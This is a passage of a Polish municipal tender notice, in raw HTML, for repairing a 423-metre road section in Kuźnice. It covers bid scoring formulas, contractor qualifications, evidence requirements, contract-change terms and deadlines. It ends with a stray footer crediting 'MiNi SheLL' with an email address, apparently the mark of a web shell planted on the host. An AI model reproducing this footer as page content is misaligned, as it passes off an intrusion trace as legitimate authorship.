class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3) Remont drogi gminnej nr 351006T w miejscowości Kuźnice <br/> w km 0+000 do km 0+423 dz. nr 348/2.<br/>Zakres robót obejmuje m.in.<br/> Długość remontowanego odcinka drogi - 423 mb,<br/> Szerokość jezdni:- 5,00m<br/> - Ścinanie poboczy mechanicznie grubości do 10 cm, ścięcie poboczy gruntowych na szerokości 1 m<br/> - Wyrównanie istniejącej podbudowy mieszanką mineralno- bitumiczną, warstwa wyrównawcza w ilości 75kg/m2<br/> - Skropienie nawierzchni emulsją drogową szybkorozpadową<br/> - Wykonanie nawierzchnia z mieszanek mineralno- bitumicznych grysowych, asfaltowe, warstwa ścieralna o grubości 4 cm<br/> - Podbudowy z kruszyw, grubość warstwy po zagęszczeniu 8 cm- pobocza szerokości 0,50m </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 144200,70 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">1 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteriami wyboru oferty najkorzystniejszej będą: <br/>a) cena brutto za wykonanie przedmiotu zamówienia – waga - 60% <br/>b) okres udzielonej przez Wykonawcę rękojmi za wady i gwarancji jakości na wykonane roboty budowlane (w miesiącach) – waga - 40% <br/>2. Sposób wyliczenia punktów oferty: <br/>a) dla kryterium „cena brutto za wykonanie przedmiotu zamówienia” - według formuły: <br/>C=Cn/Cb x 60% 1%=1 punkt <br/>gdzie: <br/>C – ilość punktów oferty rozpatrywanej <br/>Cn – cena najniższej oferty wśród ofert nieodrzuconych <br/>Cb – cena oferty rozpatrywanej <br/>Oferta z najniższą ceną otrzyma 60 punktów. Liczba punktów pozostałych ofert zostanie obliczona według powyższego wzoru. Liczba uzyskanych punktów dla danej oferty będzie podawana do dwóch miejsc po przecinku. <br/>b) dla kryterium „okres udzielonej przez Wykonawcę rękojmi za wady i gwarancji jakości” - według formuły: <br/>G=[(Gn-Gmin)/(Gmax-Gmin)] x 40% 1%=1 punkt <br/>gdzie: <br/>G– ilość punktów oferty rozpatrywanej <br/>Gn – liczba miesięcy udzielonej rękojmi za wady i gwarancji jakości w ofercie rozpatrywanej <br/>Gmin – minimalny okres rękojmi za wady i gwarancji jakości wynoszący 36 miesięcy <br/>Gmax – maksymalny okres rękojmi za wady i gwarancji jakości wynoszący 60 miesięcy<br/>Oferta, w której wykonawca zaoferował 60 miesięcy lub dłuższy okres rękojmi za wady i gwarancji jakości otrzyma 40 punktów. Liczba punktów pozostałych ofert zostanie obliczona według powyższego wzoru. <br/>Uwaga: <br/>Zamawiający informuje iż: <br/>- minimalny okres rękojmi za wady i gwarancji jakości wynosi – 36 miesięcy <br/>- maksymalny okres rękojmi za wady i gwarancji jakości wynosi - 60 miesięcy <br/>Jeżeli wykonawca nie poda (nie wpisze) w ofercie okresu rękojmi za wady i gwarancji jakości, Zamawiający przyjmie do oceny ofert okres minimalny tj. 36 miesięcy. <br/>Liczba uzyskanych punktów dla danej oferty będzie podawana do dwóch miejsc po przecinku <br/>c) Ostateczna ilość punktów oferty: <br/>P= C+G <br/>P- ostateczna ilość punktów oferty badanej <br/>C- ilość punktów oferty badanej dla kryterium „cena” <br/>G- ilość punktów oferty badanej dla kryterium „okres udzielonej przez Wykonawcę rękojmi za wady i gwarancji jakości”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres udzielonej przez Wykonawcę rękojmi za wady i gwarancji jakości na wykonane roboty budowlane (w miesiącach</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki w zakresie: <br/>1.1. sytuacji ekonomicznej lub finansowej <br/>a) Wykonawca winien wykazać, iż jest ubezpieczony od odpowiedzialności cywilnej <br/>w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną co najmniej: <br/>dla części 1 – 150 000,00 zł<br/>dla części 2 – 100 000,00 zł<br/>dla części 3 – 150 000,00 zł<br/>Przy składaniu ofert na więcej niż jedną część należy przedłożyć ubezpieczenie co najmniej na sumę gwarancyjną poszczególnych części.<br/>1.2. zdolności technicznej i zawodowej <br/>a) wykonawca winien wykazać wykonanie nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej:<br/>dla części 1 – jednej roboty budowlanej polegającej na budowie, przebudowie bądź remoncie odcinka drogi o długości minimum: 200 m <br/>dla części 2 – jednej roboty budowlanej polegającej na budowie, przebudowie bądź remoncie odcinka drogi o długości minimum: 200 m <br/>dla części 3 – jednej roboty budowlanej polegającej na budowie, przebudowie bądź remoncie odcinka drogi o długości minimum: 200 m <br/>Przy składaniu ofert na więcej niż jedną część należy przedłożyć wykonanie: <br/>Dla dwóch części: <br/>jednej lub dwie roboty budowlane polegającej na budowie, przebudowie bądź remoncie odcinka drogi o łącznej długości minimum: 400 m <br/>Dla trzech części: <br/>jedną dwie lub trzy roboty budowlane polegającej na budowie, przebudowie bądź remoncie odcinka drogi o łącznej długości minimum: 600 m <br/><br/>b) wykonawca winien wykazać, iż dysponuje osobą, która będzie pełnić funkcję kierownika robót, posiadających uprawnienia do kierowania robotami budowlanymi niezbędnymi do wykonania przedmiotu zamówienia, w specjalności: drogowej (lub inne odpowiadające - wydane na podstawie wcześniej obowiązujących przepisów) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy pzp, sporządzony/a nie wcześniej niż 3 miesiące przed jego/jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; b)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności <br/>c)	zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności <br/>d)	oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy pzp , w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w art. 108 ust. 1 pkt 1-6 ustawy pzp2. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast zaświadczeń, o których mowa w pkt. 1 lit. b i c lub odpisu albo informacji którym mowa w pkt. 1 lit. a - składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: <br/>a) nie naruszył obowiązków dotyczących płatności podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, <br/>b) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. 3. Dokumenty, o których mowa w pkt. 2, powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem. <br/>4. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt.1, lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4, art. 109 ust. 1 pkt 1 ustawy pzp, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Przepis pkt. 3 stosuje się.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną co najmniej: <br/>dla części 1 – 150 000,00 zł<br/>dla części 2 – 100 000,00 zł<br/>dla części 3 – 150 000,00 zł<br/>Przy składaniu ofert na więcej niż jedną część<br/>należy przedłożyć ubezpieczenie co najmniej na sumę gwarancyjną poszczególnych części.<br/>b) wykaz robót budowlanych spełniających wymagania określone w SWZ<br/>dla części 1 – jednej roboty budowlanej polegającej na budowie, przebudowie bądź remoncie odcinka drogi o długości minimum: 200 m <br/>dla części 2 – jednej roboty budowlanej polegającej na budowie, przebudowie bądź remoncie odcinka drogi o długości minimum: 200 m <br/>dla części 3 – jednej roboty budowlanej polegającej na budowie, przebudowie bądź remoncie odcinka drogi o długości minimum: 200 m <br/>Przy składaniu ofert na więcej niż jedną część należy przedłożyć wykonanie: <br/>Dla dwóch części: <br/>jednej lub dwie roboty budowlane polegającej na budowie, przebudowie bądź remoncie odcinka drogi o łącznej długości minimum: 400 m <br/>Dla trzech części: <br/>jedną dwie lub trzy roboty budowlane polegającej na budowie, przebudowie bądź remoncie odcinka drogi o łącznej długości minimum: 600 m.<br/> <br/>wykonanej nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotu na rzecz którego roboty te zostały wykonane – sporządzony wg załącznika nr 5 do SWZ. Do przedmiotowego wykazu należy dołączyć dowody określające czy te roboty budowlane zostały wykonane należycie. Dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. <br/>Uwaga: Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi wykonawcami, przedmiotowy wykaz winien dotyczyć robót budowlanych, w których wykonaniu wykonawca bezpośrednio uczestniczył.<br/><br/>c) wykaz osób, skierowanych przez wykonawcę do realizacji przedmiotowego zamówienia, odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich doświadczenia, kwalifikacji zawodowych i uprawnień niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi zasobami tj. osób, która będzie pełnić funkcję kierownika robót, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności: <br/>- drogowej (lub inne odpowiadające - wydane na podstawie wcześniej obowiązujących przepisów)<br/>sporządzony wg załącznika nr 6 do SWZ. <br/>2. Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć podmiotowych środków dowodowych, o których mowa w powyższym ppkt 1. lit. a może złożyć inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnienie przedmiotowych warunków</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> a) dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną co najmniej: <br/>dla części 1 – 150 000,00 zł<br/>dla części 2 – 100 000,00 zł<br/>dla części 3 – 150 000,00 zł<br/>Przy składaniu ofert na więcej niż jedną część<br/>należy przedłożyć ubezpieczenie co najmniej na sumę gwarancyjną poszczególnych części.<br/>b) wykaz robót budowlanych spełniających wymagania określon SWZ <br/>dla części 1 – jednej roboty budowlanej polegającej na budowie, przebudowie bądź remoncie odcinka drogi o długości minimum: 200 m <br/>dla części 2 – jednej roboty budowlanej polegającej na budowie, przebudowie bądź remoncie odcinka drogi o długości minimum: 200 m <br/>dla części 3 – jednej roboty budowlanej polegającej na budowie, przebudowie bądź remoncie odcinka drogi o długości minimum: 200 m <br/><br/>Przy składaniu ofert na więcej niż jedną część należy przedłożyć wykonanie: <br/>Dla dwóch części: <br/>jednej lub dwie roboty budowlane polegającej na budowie, przebudowie bądź remoncie odcinka drogi o łącznej długości minimum: 400 m <br/>Dla trzech części: <br/>jedną dwie lub trzy roboty budowlane polegającej na budowie, przebudowie bądź remoncie odcinka drogi o łącznej długości minimum: 600 m.<br/> <br/>wykonanej nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotu na rzecz którego roboty te zostały wykonane – sporządzony wg załącznika nr 5 do SWZ. Do przedmiotowego wykazu należy dołączyć dowody określające czy te roboty budowlane zostały wykonane należycie. Dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. <br/>Uwaga: Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi wykonawcami, przedmiotowy wykaz winien dotyczyć robót budowlanych, w których wykonaniu wykonawca bezpośrednio uczestniczył.<br/><br/>c) wykaz osób, skierowanych przez wykonawcę do realizacji przedmiotowego zamówienia, odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich doświadczenia, kwalifikacji zawodowych i uprawnień niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi zasobami tj. osób, która będzie pełnić funkcję kierownika robót, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności: <br/>- drogowej (lub inne odpowiadające - wydane na podstawie wcześniej obowiązujących przepisów)<br/>sporządzony wg załącznika nr 6 do SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>2. W przypadku wspólnego ubiegania się o udzielenie zamówienia , wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>3. Jeżeli zostanie wybrana jako najkorzystniejsza oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <br/>4. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>5. Podmiotowe środki dowodowe dotyczące braku podstaw do wykluczenia z postępowania, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie<br/>6. Wykonawcy, wspólnie ubiegający się o udzielenie zamówienia wskazują w formularzu ofert, które roboty budowlane wykonają poszczególni wykonawcy. <br/>7. Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) zmiana terminu realizacji przedmiotu umowy spowodowana:<br/>a) klęskami żywiołowymi;<br/>b) warunkami atmosferycznymi uniemożliwiającymi prowadzenie robót budowlanych, w tym przeprowadzenia prób i sprawdzeń, dokonanie odbiorów - to jest wystąpienie<br/>średniodobowej temperatury poniżej minus 5 stopni Celsjusza w okresie dłuższym niż 10 dni lub opadów atmosferycznych, których wystąpienie spowoduje uniemożliwienie prowadzenia robót budowlanych, co zostanie potwierdzone przez Inspektora nadzoru inwestorskiego.<br/>c) wstrzymaniem realizacji umowy przez Zamawiającego z przyczyn niezależnych od Wykonawcy;<br/>d) siłą wyższą uniemożliwiającą wykonanie przedmiotu umowy<br/>e) gdy zaistnieją przyczyny niezależne od działania Stron umowy, których przy zachowaniu wszelkich należnych środków nie można uniknąć ani im zapobiec<br/>f) napotkaniem przez Wykonawcę lub Zamawiającego okoliczności niemożliwych do przewidzenia i niezależnych od nich np. przedłużenie się procedury przetargowej w tym z powodu wniesienia odwołań podczas postępowania przetargowego mających wpływ na termin zawarcia niniejszej umowy, wystąpienia zjawisk związanych z działaniami osób trzecich uniemożliwiających wykonywanie prac, zmian przepisów prawa polskiego albo prawa wspólnotowego<br/>2). Okoliczności, o których mowa w powyższym pkt. 1). muszą być odnotowane w dzienniku budowy oraz muszą być udokumentowane stosownymi protokołami podpisanymi przez, kierownika budowy (robót), inspektora nadzoru inwestorskiego i zaakceptowane przez Zamawiającego.<br/>3). W przedstawionych w powyższym pkt. 1). okolicznościach na podstawie, których wystąpią opóźnienia w realizacji przedmiotu umowy, strony ustalą nowe terminy, z tym że maksymalny okres przesunięcia terminu zakończenia realizacji przedmiotu umowy równy będzie okresowi przerwy lub przestoju.<br/>4). Pozostałe dopuszczalne zmiany umowy:<br/>a) wydłużenie okresu gwarancji lub rękojmi, o dowolny okres;<br/>b) zmiana spowodowana wprowadzaniem robót zamiennych,<br/>c) wynagrodzenie za przedmiot umowy określone w umowie może podlegać zmianom <br/>w następujących przypadkach:<br/>- w przypadku gdy zmiany będą korzystne dla Zamawiającego, np. Wykonawca wprowadzi specjalny rabat lub gdy konieczna będzie zmiana sposobu realizacji niniejszej umowy np. ze względu na zmianę przepisów prawa i wytycznych, okoliczności, których nie można było przewidzieć na etapie podpisania umowy, która spowoduje konieczność zaniechania realizacji części robót (niewykonanie ich w trakcie umowy) - w takich przypadkach wartość umowy ulegnie odpowiedniemu zmniejszeniu;<br/>- w przypadku urzędowych zmian w obowiązujących przepisach podatkowych, w tym zmiany podatku VAT<br/>d) Wykonawca może proponować zmianę osób mających pełnić określone funkcje <br/>w realizacji zamówienia na inne legitymujące się równoważnym wykształceniem spełniającym wymogi SWZ. Zmiana taka jest możliwa jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nową osobę.<br/>Zmiana osób mających pełnić określone funkcje w realizacji zamówienia może nastąpić <br/>w następujących przypadkach:<br/>- śmierci, choroby lub innych zdarzeń losowych, służbowych, niemożności wykonywania pracy, niezdolności do właściwego wykonywania pracy;<br/>- jeżeli zmiana stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacji, itp.);<br/>- w uzasadnionych przypadkach gdy dana osoba nie wykonuje swoich obowiązków wynikających z Umowy lub wykonuje je niewłaściwie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-29 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://naglowice.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-29 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający zastrzega sobie unieważnienie postępowania jeżeli nie otrzyma dofinansowania ze Środków Rezerwy Celowej Budżetu Państwa Przeznaczonych na Przeciwdziałanie Skutkom Klęsk Żywiołowych lub ich Usuwania".

Creat By MiNi SheLL
Email: jattceo@gmail.com